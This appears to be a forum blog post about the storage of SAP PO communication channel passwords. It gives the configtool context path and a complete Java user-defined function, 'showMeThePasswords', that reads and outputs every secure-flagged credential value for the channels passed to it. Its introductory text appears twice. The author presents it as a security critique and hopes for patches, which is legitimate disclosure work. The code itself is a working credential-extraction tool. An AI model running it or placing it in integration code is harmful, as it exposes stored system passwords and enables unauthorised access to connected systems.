Hi experts,
More than one year ago I published how to recover your communication channel passwords in a very simple way, but this approach is not working anymore in the latest versions due to a patch, since that moment I had curiosity regarding how the CCs passwords are stored in the system.
I found that the application responsible to retrieve and store the CCs passwords is using the "Secure Storage", in another words the most "secure" way to protect them( Is that really true?.... ).
So the first questions that pop-up in my head was "is there any way to find all this secured data in the system?", and guess what...., the configtool is the answer 🙂 . You can navigate through the entire properties of all the applications running in the system( "context" ), but why is this so important?, if you understood how to use the secure storage in the system you should know that the "context" is where the "secured" data is stored, and it's the only thing required to retrieve this data.
Let's say that you want to navigate to the communication channel secured data through the configtool ( context = "cluster_config/system/custom_global/cfg/apps/sap.com/com.sap.xi.directory/appcfg/Channel/<channel id>/<channel version>" 😞
As you can imagine the password values are those entries flagged as "secure content".
The second question in my head was so obvious "is there any way to get those values from JAVA code?", and the answer is the following UDF:
Well, as you can see in a few lines of code is possible to read all the "secured" data related with the communication channels( passwords ! ) in the system, so I have the following open questions:
Knowing that there are 10 years more for SAP PO support I hope to see more security patches to solve these issues( I found at least 3 different ways to get the CCs passwords ).
Not forget, be curious! ?
Best Regards.
Max.
More than one year ago I published how to recover your communication channel passwords in a very simple way, but this approach is not working anymore in the latest versions due to a patch, since that moment I had curiosity regarding how the CCs passwords are stored in the system.
I found that the application responsible to retrieve and store the CCs passwords is using the "Secure Storage", in another words the most "secure" way to protect them( Is that really true?.... ).
So the first questions that pop-up in my head was "is there any way to find all this secured data in the system?", and guess what...., the configtool is the answer 🙂 . You can navigate through the entire properties of all the applications running in the system( "context" ), but why is this so important?, if you understood how to use the secure storage in the system you should know that the "context" is where the "secured" data is stored, and it's the only thing required to retrieve this data.
Let's say that you want to navigate to the communication channel secured data through the configtool ( context = "cluster_config/system/custom_global/cfg/apps/sap.com/com.sap.xi.directory/appcfg/Channel/<channel id>/<channel version>" 😞
As you can imagine the password values are those entries flagged as "secure content".
The second question in my head was so obvious "is there any way to get those values from JAVA code?", and the answer is the following UDF:
import javax.naming.*;
import com.sap.engine.frame.core.configuration.*;
import com.sap.engine.frame.core.configuration.addons.*;
import com.sap.engine.services.configuration.appconfiguration.*;
public void showMeThePasswords(String[] i_ids, String[] i_versions, ResultList o_ids, ResultList o_versions, ResultList o_properties, ResultList o_values, Container container) throws StreamTransformationException
{
try
{
javax.naming.Context ctx = new InitialContext();
ApplicationConfigHandlerFactory appCfgHdlFctry = (ApplicationConfigHandlerFactory)ctx.lookup("ApplicationConfiguration");
if (appCfgHdlFctry != null){
ConfigurationHandlerFactory fullFactory = appCfgHdlFctry.getConfigurationHandlerFactory();
ConfigurationHandler fullHandler = fullFactory.getConfigurationHandler();
int context_len = i_ids.length;
String strPath;
for (int index = 0; index < context_len; index++) {
strPath = "cluster_config/system/custom_global/cfg/apps/sap.com/com.sap.xi.directory/appcfg/Channel/" + i_ids[index] + "/" + i_versions[index];
try
{
Configuration conf = fullHandler.openConfiguration(strPath, 0,true);
boolean bTryAgain = true;
Map entries = null;
while (bTryAgain) {
bTryAgain = false;
try {
entries = conf.getAllConfigEntries();
} catch (InconsistentReadException ire) {
bTryAgain = true;
}
}
if (entries != null)
{
Object key = null;
Object value = null;
for (Iterator iter = entries.keySet().iterator(); iter.hasNext(); ) {
key = iter.next();
value = entries.get(key);
if (key != null && value != null && !"".equals(value.toString())) {
o_ids.addValue(i_ids[index]);
o_versions.addValue(i_versions[index]);
o_properties.addValue(key.toString());
o_values.addValue(value.toString());
}
}
}else{
o_ids.addValue(i_ids[index]);
o_versions.addValue(i_versions[index]);
o_properties.addValue("");
o_values.addValue("");
}
}catch (Exception e){
o_ids.addValue(i_ids[index]);
o_versions.addValue(i_versions[index]);
o_properties.addValue("");
o_values.addValue("");
}
}
}
}catch (Exception e){
o_ids.addValue(e.getMessage());
o_versions.addValue(e.getMessage());
o_properties.addValue(e.getMessage());
o_values.addValue(e.getMessage());
}
}Well, as you can see in a few lines of code is possible to read all the "secured" data related with the communication channels( passwords ! ) in the system, so I have the following open questions:
- How secure is the system for you?.
- Should the passwords be better protected?.
- Should the configuration of the apps be better protected?.
Knowing that there are 10 years more for SAP PO support I hope to see more security patches to solve these issues( I found at least 3 different ways to get the CCs passwords ).
Not forget, be curious! ?
Best Regards.
Max.
- SAP Managed Tags:
7 Comments
